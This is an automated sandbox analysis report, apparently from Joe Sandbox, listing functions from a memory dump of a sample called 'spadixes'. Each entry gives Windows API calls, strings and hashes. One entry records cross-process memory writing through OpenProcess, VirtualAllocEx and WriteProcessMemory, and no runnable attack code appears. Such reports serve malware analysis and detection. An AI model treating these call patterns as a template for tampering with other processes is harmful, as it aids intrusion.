Opcode ID: 81adea9f407723bb3638d2f713307351e0ddf67cbef783c7105e8f216a86648c
Instruction ID: b02ab3c939fb81629955476ab283714c3db307ca66497f283b5f3ca42c36e3cf
Opcode Fuzzy Hash: 81adea9f407723bb3638d2f713307351e0ddf67cbef783c7105e8f216a86648c
Instruction Fuzzy Hash: 76C12475608309AFC700DF68C884A6AB7EAFF89308F00495DF58ADB261DB71ED45CB52

Function 00904025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00904047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,009030A5,?,00000001), ref: 0090405B
GetWindowThreadProcessId.USER32(00000000), ref: 00904062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 00904071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00904083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 0090409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 009040AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 009040F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904113

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: cb2736dd2eeb6e4cb660cd7940373a3564e359d1f8cbfdfdff0994fb3b5ad26c
Instruction ID: 870180b61953a99959c3f28b6e19e82f179e323a30b4ad7277a83efd0a4c8b31
Opcode Fuzzy Hash: cb2736dd2eeb6e4cb660cd7940373a3564e359d1f8cbfdfdff0994fb3b5ad26c
Instruction Fuzzy Hash: 1E31BFB9518204BFDB20DB54DC85F7977BEABA5711F11C105FE04E62A0CBB4D9809B64

Function 008C3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008C30DC
CoUninitialize.OLE32(?,00000000), ref: 008C3181
UnregisterHotKey.USER32(?), ref: 008C32A9
DestroyWindow.USER32(?), ref: 00935079
FreeLibrary.KERNEL32(?), ref: 009350F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00935125

Strings

close all, xrefs: 008C30D7

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
Instruction ID: ce447778f5e8f56453ab55c4b365f539c050236e111a4da829d808efbd10218d
Opcode Fuzzy Hash: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
Instruction Fuzzy Hash: 8891F0342006028FC719EB28C895F68F3B8FF19304F5582ADE40AA7262DB31EE56CF45

Function 0091C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 008F9ABF: CLSIDFromProgID.OLE32 ref: 008F9ADC
Part of subcall function 008F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 008F9AF7
Part of subcall function 008F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 008F9B05
Part of subcall function 008F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 008F9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0091C235
_memset.LIBCMT ref: 0091C242
_memset.LIBCMT ref: 0091C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0091C38C
CoTaskMemFree.OLE32(?), ref: 0091C397

Strings

NULL Pointer assignment, xrefs: 0091C3E5

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 11eca4cd35fc130691295302cc5e5bbcf05a950c255c19811bcce8a9c4aba0de
Instruction ID: dc7ef5df9afdf8969832be4bda71d266e1e65d1458fc813b0ea1019f2ec99c2e
Opcode Fuzzy Hash: 11eca4cd35fc130691295302cc5e5bbcf05a950c255c19811bcce8a9c4aba0de
Instruction Fuzzy Hash: FA910971E4021CABDB10DFA4DC51EEEBBB9FF04710F10816AE519A7291DB709A45CFA1

Function 00930133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F

GetSystemMetrics.USER32(0000000F), ref: 0093016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0093038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009303AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 009303D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009303FF
ShowWindow.USER32(00000003,00000000), ref: 00930421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00930440

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
Instruction ID: 487f50d104636ea22ab6d195aacafedd3a4aa8ef6555047093e4b58d6b0c45f6
Opcode Fuzzy Hash: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
Instruction Fuzzy Hash: 94A19D35600616EFDB18CF68C999BBEBBB5BF88700F048115EC59A7290E734AD60DF90

Function 008FE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008FE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 008FE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008FE1D8
ReleaseDC.USER32(00000000,00000000), ref: 008FE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 008FE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 008FE209

Part of subcall function 008F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,008F9A05), ref: 008FA53A

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
Instruction ID: 81e8348433b5d6ea07a534b6280a16c10ebb91b4994008fc6e9b68e9a99e2425
Opcode Fuzzy Hash: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
Instruction Fuzzy Hash: A4018FB9A01618BFEB109BB68C45F5EBFB8EB49751F004066EE04E7290D6709C00CBA0

Function 00900213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0090027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009002B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009002C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00900344

Strings

DllGetClassObject, xrefs: 009002B7

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 58084427561ac1261798d46f4893e4977a5f6473c1b0a859d242ac6b3e27beb8
Instruction ID: cb6e03a78981ce4779ab05d108476475cdb7f57259a349fa90c1495f56293c90
Opcode Fuzzy Hash: 58084427561ac1261798d46f4893e4977a5f6473c1b0a859d242ac6b3e27beb8
Instruction Fuzzy Hash: 32418E71605204EFDB06CF54C884B9A7BB9EF89314F1480A9ED09DF286D7B5DE44CBA0

Function 00905007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00905075
GetMenuItemInfoW.USER32 ref: 00905091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 009050D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00981708,00000000), ref: 00905120

Strings

0, xrefs: 0090506D

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: b50c523d182be6d763f9f27e59ab12d22f35d1d0070a9c0e8ebef4324deb9822
Instruction ID: 3054926edbbddb698c4fa7728bf8f78f272ee113f50848e45ff63f70a0faa879
Opcode Fuzzy Hash: b50c523d182be6d763f9f27e59ab12d22f35d1d0070a9c0e8ebef4324deb9822
Instruction Fuzzy Hash: DA41AC742097019FD7209F28D881B6BB7E8EF86324F054A1EF9A9972D1D770E900CF62

Function 0092E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0092E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0092E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0092E248
GetWindowLongW.USER32(?,000000EC), ref: 0092E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0092E281

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 72f56b282be5f6f74decdc57202153fbcb8a4808e08b86a7f1116c650f7e5ef1
Instruction ID: e994823c8bd652907e346f9d8865a43e3d3f7339b03b4b551d1686713b8b1a8d
Opcode Fuzzy Hash: 72f56b282be5f6f74decdc57202153fbcb8a4808e08b86a7f1116c650f7e5ef1
Instruction Fuzzy Hash: 1261B338A48224AFDB24DF58E8D5FAA77BEEF89300F044069F95997396C770AD51CB10

Function 00911206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009112B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009112DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0091131C

Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00911341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00911349

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
Instruction ID: 9489f57cb405a29b52144c6a8ca249252f89655c2d49af15c3630fb94213c75e
Opcode Fuzzy Hash: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
Instruction Fuzzy Hash: 16411C35A00109EFCB01EF68C985EADBBF5FF49310B148099E95AAB361CB31ED41DB51

Function 008E217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 008E21A9
CreateThread.KERNEL32(?,?,008E22DF,00000000,?,?), ref: 008E21ED
GetLastError.KERNEL32 ref: 008E21F7
_free.LIBCMT ref: 008E2200
__dosmaperr.LIBCMT ref: 008E220B

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 172f1f5138aec97405d49c0f52f05fd4af899f0e0e4a9d5f3ce521c0e2b4931a
Instruction ID: 8203bc5fb4e04a760e268ddcf756286945fa2b695002b4d89815c66af49953b6
Opcode Fuzzy Hash: 172f1f5138aec97405d49c0f52f05fd4af899f0e0e4a9d5f3ce521c0e2b4931a
Instruction Fuzzy Hash: 6D11E5321083C6AFDB11AF6A9C41D6B7B9CFF03774B100529FA14C6181EB71D81196A2

Function 008DB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008DB0BA
StrokeAndFillPath.GDI32(?,?,0093E680,00000000,?,?,?), ref: 008DB0D6
SelectObject.GDI32(?,00000000), ref: 008DB0E9
DeleteObject.GDI32 ref: 008DB0FC
StrokePath.GDI32(?), ref: 008DB117

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
Instruction ID: e585603f73cc5c6e0e685443afa5bb01e734362222bf3d51ee7caaa0619dbf12
Opcode Fuzzy Hash: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
Instruction Fuzzy Hash: CEF01938029648EFDB259F65EC0CB543B68FB017A6F188315E4A5852F0D7318956EF50

Function 008FC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0090430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC08,?,?,00000034,00000800,?,00000034), ref: 00904335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008FC1D3

Part of subcall function 009042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00904300

Part of subcall function 0090422F: GetWindowThreadProcessId.USER32(?,?), ref: 0090425A
Part of subcall function 0090422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0090426A
Part of subcall function 0090422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00904280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC28D

Strings

@, xrefs: 008FC2A5

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
Instruction ID: 21394263ef5336fd1add2aba69bdffc2a455a5f69bbf06a2464efca9d0c894b3
Opcode Fuzzy Hash: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
Instruction Fuzzy Hash: 874139B6A0021CAEDB10DBA8CD81BEEB7B8FB49300F004095FA55B7181DA71AF45DB61

Function 008E2288 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 008E22A1
GetProcAddress.KERNEL32(00000000), ref: 008E22A8

Strings

combase.dll, xrefs: 008E229C
RoInitialize, xrefs: 008E2290

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 023606955e9e930e1b77a1058948c7d0b86c371d50f0e8e4751f69a7b90caafb
Instruction ID: 9c59ec744251092a89acaa4007835200995b2cea77601bff2723f6353c8d9a7f
Opcode Fuzzy Hash: 023606955e9e930e1b77a1058948c7d0b86c371d50f0e8e4751f69a7b90caafb
Instruction Fuzzy Hash: D1E04F797BD3006BDB906F70EC4EF0A3A55BB82715F104468F202D71E0DBB88088EB08

Function 008E2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 008E22A1
GetProcAddress.KERNEL32(00000000), ref: 008E22A8

Strings

combase.dll, xrefs: 008E229C
RoInitialize, xrefs: 008E2290

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: dbc4eb55faf0e0bc3464c4199d586486b68a51491bdaa2af6dba37ccc9d4fa15
Instruction ID: 73f9569e4f1561bacdc8c9f2c77b2dbd834213300a7d77a575bf99cd717359d7
Opcode Fuzzy Hash: dbc4eb55faf0e0bc3464c4199d586486b68a51491bdaa2af6dba37ccc9d4fa15
Instruction Fuzzy Hash: 77E05E387FD301ABDA602B71DC0EF293618BB82B16F004064F302D60E0DBE84444EB08

Function 008DE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,008DE014,771B0AE0,008DDEF1,0095DC38,?,?), ref: 008DE02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008DE03E

Strings

kernel32.dll, xrefs: 008DE027
GetNativeSystemInfo, xrefs: 008DE038

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
Instruction ID: 19336c168d982843c0d083f1476da169626a6c5dd16dc4c173042950499aff13
Opcode Fuzzy Hash: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
Instruction Fuzzy Hash: 4DD0A739528B129FC7355F60EC08A1277D4FF05304F18841AE885D2650E7B4CC80C760

Function 008C42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,008C42EC,?,008C42AA,?), ref: 008C4304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4316

Strings

kernel32.dll, xrefs: 008C42FF
Wow64RevertWow64FsRedirection, xrefs: 008C4310

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: AddressLibraryLoadProc
